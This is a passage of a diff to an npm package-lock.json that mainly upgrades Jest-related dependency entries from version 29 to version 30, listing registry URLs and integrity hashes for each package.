"https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", + "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", + "dev": true + }, + "has-symbols": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz", + "integrity": "sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==" + }, + "has-tostringtag": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz", + "integrity": "sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==", "requires": { - "jest-regex-util": "^29.2.0", - "jest-snapshot": "^29.4.1" - }, - "dependencies": { - "jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true - } + "has-symbols": "^1.0.3" } }, - "jest-runner": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.4.1.tgz", - "integrity": "sha512-8d6XXXi7GtHmsHrnaqBKWxjKb166Eyj/ksSaUYdcBK09VbjPwIgWov1VwSmtupCIz8q1Xv4Qkzt/BTo3ZqiCeg==", - "dev": true, + "hasown": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", + "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", "requires": { - "@jest/console": "^29.4.1", - "@jest/environment": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.2.0", - "jest-environment-node": "^29.4.1", - "jest-haste-map": "^29.4.1", - "jest-leak-detector": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-resolve": "^29.4.1", - "jest-runtime": "^29.4.1", - "jest-util": "^29.4.1", - "jest-watcher": "^29.4.1", - "jest-worker": "^29.4.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "dependencies": { - "@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", - "integrity": "sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" - } - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true - }, - "jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - } - }, - "p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "requires": { - "yocto-queue": "^0.1.0" - } - }, - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - }, - "write-file-atomic": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } - } + "function-bind": "^1.1.2" } }, - "jest-runtime": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.4.1.tgz", - "integrity": "sha512-UXTMU9uKu2GjYwTtoAw5rn4STxWw/nadOfW7v1sx6LaJYa3V/iymdCLQM6xy3+7C6mY8GfX22vKpgxY171UIoA==", + "hpagent": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", + "integrity": "sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==", + "dev": true + }, + "ip-address": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-9.0.5.tgz", + "integrity": "sha512-zHtQzGojZXTwZTHQqra+ETKd4Sn3vgi7uBmlPoXVWZqYvuKmtI0l/VZTjqGmJY9x88GGOaZ9+G9ES8hC4T4X8g==", "dev": true, "requires": { - "@jest/environment": "^29.4.1", - "@jest/fake-timers": "^29.4.1", - "@jest/globals": "^29.4.1", - "@jest/source-map": "^29.2.0", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-mock": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-resolve": "^29.4.1", - "jest-snapshot": "^29.4.1", - "jest-util": "^29.4.1", - "semver": "^7.3.5", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" + "jsbn": "1.1.0", + "sprintf-js": "^1.1.3" }, "dependencies": { - "@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", - "integrity": "sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" - } - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", + "sprintf-js": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.3.tgz", + "integrity": "sha512-Oo+0REFV59/rz3gfJNKQiBlwfHaSESl1pcGyABQsnnIfWOFt6JNj5gCog2U6MLZ//IGYD+nA8nI+mTShREReaA==", "dev": true - }, - "jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - } - }, - "semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "requires": { - "lru-cache": "^6.0.0" - } - }, - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - }, - "write-file-atomic": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } } } }, - "jest-snapshot": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.4.1.tgz", - "integrity": "sha512-l4iV8EjGgQWVz3ee/LR9sULDk2pCkqb71bjvlqn+qp90lFwpnulHj4ZBT8nm1hA1C5wowXLc7MGnw321u0tsYA==", + "is-number": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", + "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", + "dev": true + }, + "isomorphic-ws": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", + "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", + "dev": true, + "requires": {} + }, + "jest-diff": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-30.0.4.tgz", + "integrity": "sha512-TSjceIf6797jyd+R64NXqicttROD+Qf98fex7CowmlSn7f8+En0da1Dglwr1AXxDtVizoxXYZBlUQwNhoOXkNw==", "dev": true, "requires": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/traverse": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/babel__traverse": "^7.0.6", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.4.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.4.1", - "jest-get-type": "^29.2.0", - "jest-haste-map": "^29.4.1", - "jest-matcher-utils": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.4.1", - "semver": "^7.3.5" + "@jest/diff-sequences": "30.0.1", + "@jest/get-type": "30.0.1", + "chalk": "^4.1.2", + "pretty-format": "30.0.2" }, "dependencies": { - "@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", - "integrity": "sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" - } - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "diff-sequences": { - "version": "29.3.1", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.3.1.tgz", - "integrity": "sha512-hlM3QR272NXCi4pq+N4Kok4kOp6EsgOM3ZSpJI7Da3UAs+Ttsi8MRmB6trM/lhyzUxGfOgnpkHtgqm5Q/CTcfQ==", - "dev": true - }, - "jest-diff": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.4.1.tgz", - "integrity": "sha512-uazdl2g331iY56CEyfbNA0Ut7Mn2ulAG5vUaEHXycf1L6IPyuImIxSz4F0VYBKi7LYIuxOwTZzK3wh5jHzASMw==", + "@jest/schemas": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-30.0.1.tgz", + "integrity": "sha512-+g/1TKjFuGrf1Hh0QPCv0gISwBxJ+MQSNXmG9zjHy7BmFhtoJ9fdNhWJp3qUKRi93AOZHXtdxZgJ1vAtz6z65w==", "dev": true, "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^29.3.1", - "jest-get-type": "^29.2.0", - "pretty-format": "^29.4.1" + "@sinclair/typebox": "^0.34.0" } }, - "jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", + "@sinclair/typebox": { + "version": "0.34.37", + "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.34.37.tgz", + "integrity": "sha512-2TRuQVgQYfy+EzHRTIvkhv2ADEouJ2xNS/Vq+W5EuuewBdOrvATvljZTxHWZSTYr2sTjTHpGvucaGAt67S2akw==", "dev": true }, - "jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", + "ansi-styles": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", + "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", "dev": true }, - "jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - } - }, - "semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "requires": { - "lru-cache": "^6.0.0" - } - }, - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - }, - "write-file-atomic": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", + "pretty-format": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-30.0.2.tgz", + "integrity": "sha512-yC5/EBSOrTtqhCKfLHqoUIAXVRZnukHPwWBJWR7h84Q3Be1DRQZLncwcfLoPA5RPQ65qfiCMqgYwdUuQ//eVpg==", "dev": true, "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" + "@jest/schemas": "30.0.1", + "ansi-styles": "^5.2.0", + "react-is": "^18.3.1" } } } }, - "jest-util": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.4.1.tgz", - "integrity": "sha512-bQy9FPGxVutgpN4VRc0hk6w7Hx/m6L53QxpDreTZgJd9gfx/AV2MjyPde9tGyZRINAUrSv57p2inGBu2dRLmkQ==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - } - }, - "jest-validate": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.4.1.tgz", - "integrity": "sha512-qNZXcZQdIQx4SfUB/atWnI4/I2HUvhz8ajOSYUu40CSmf9U5emil8EDHgE7M+3j9/pavtk3knlZBDsgFvv/SWw==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.2.0", - "leven": "^3.1.0", - "pretty-format": "^29.4.1" - }, - "dependencies": { - "camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true - }, - "jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true - } - } - }, - "jest-watcher": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.4.1.tgz", - "integrity": "sha512-vFOzflGFs27nU6h8dpnVRER3O2rFtL+VMEwnG0H3KLHcllLsU8y9DchSh0AL/Rg5nN1/wSiQ+P4ByMGpuybaVw==", - "dev": true, - "requires": { - "@jest/test-result": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.4.1", - "string-length": "^4.0.1" - } + "jest-regex-util": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-30.0.1.tgz", + "integrity": "sha512-jHEQgBXAgc+Gh4g0p3bCevgRCVRkB4VB70zhoAE48gxeSr1hfUOsM/C2WoJgVL7Eyg//hudYENbm3Ne+/dRVVA==", + "dev": true }, "jose": { - "version": "4.15.5", - "resolved": "https://registry.npmjs.org/jose/-/jose-4.15.5.tgz", - "integrity": "sha512-jc7BFxgKPKi94uOvEmzlSWFFe2+vASyXaKUpdQKatWAESU2MWjDfFf0fdfc83CDKcA5QecabZeNLyfhe3yKNkg==", - "optional": true + "version": "6.0.11", + "resolved": "https://registry.npmjs.org/jose/-/jose-6.0.11.tgz", + "integrity": "sha512-QxG7EaliDARm1O1S8BGakqncGT9s25bKL1WSf6/oa17Tkqwi8D2ZNglqCF+DsYF88/rV66Q/Q2mFAy697E1DUg==", + "dev": true }, "js-tokens": { "version": "4.0.0", @@ -8265,145 +2306,55 @@ "argparse": "^2.0.1" } }, - "jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha1-peZUwuWi3rXyAdls77yoDA7y9RM=" - }, - "jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true - }, - "json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" - }, - "json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" - }, - "json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha1-Epai1Y/UXxmg9s4B1lcB4sc1tus=" - }, - "json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true - }, - "jsonpath-plus": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-7.2.0.tgz", - "integrity": "sha512-zBfiUPM5nD0YZSBT/o/fbCUlCcepMIdP0CJZxM1+KgA4f2T206f6VAg9e7mX35+KlMaIc5qXW34f3BnwJ3w+RA==" - }, - "jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "requires": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - } - }, - "kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true - }, - "leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true - }, - "lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "requires": { - "p-locate": "^4.1.0" - } - }, - "lodash": { - "version": "4.17.21", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", - "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" - }, - "lodash.memoize": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/lodash.memoize/-/lodash.memoize-4.1.2.tgz", - "integrity": "sha512-t7j+NzmgnQzTAYXcsHYLgimltOV1MXHtlOWf6GjL9Kj8GK5FInw5JotxvbOs+IvV1/Dzo04/fCGfLVs7aXb4Ag==", - "dev": true - }, - "lru-cache": { - "version": "6.0.0", - "resolved": 